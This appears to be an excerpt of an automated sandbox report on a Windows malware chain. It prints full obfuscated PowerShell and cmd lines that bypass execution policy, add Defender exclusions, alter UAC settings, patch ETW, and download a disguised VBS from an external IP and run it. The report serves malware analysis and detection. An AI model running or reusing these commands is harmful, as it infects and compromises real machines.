B2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWdieUJrYVhKbGRNT3zaeq=hci5QYWRkaW5nPVtTeXN0zdpt=3QuVUkuUmF3VUkuV2luZGzgtb=21aMWJtTjBhVzl1SUVGa1zkdn=BJQ0pET2lCQlpHUmxaQzRzljz=JDdkFCQ29BQkNrQUJDZUFzluh=tDb252ZXJ0XTo6KCdnbmlzlzd=aVzVrWlhKRmVHTnNkWE5wzpvk=NvbUFCQ3ByQUJDZUFCQ3Nztbw=jbnFwICRudWxsO3FtYWluzudf=Q2drWlhocGMzUnBibWRGZzybz=CQ3lBQkNdOjpMQUJDb0FC
                  Source: powershell.exe, 0000002B.00000002.2973651657.0000000009902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RyaW5nW11dICgnpzxb=hqYkhWemFXOXVVR0YwYUNpzyu=aWx6bGI9TmV3LU9iamVjdqceh=2tiZ3puICh5bGNmeGZldGqcfb=YjNKQlpHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 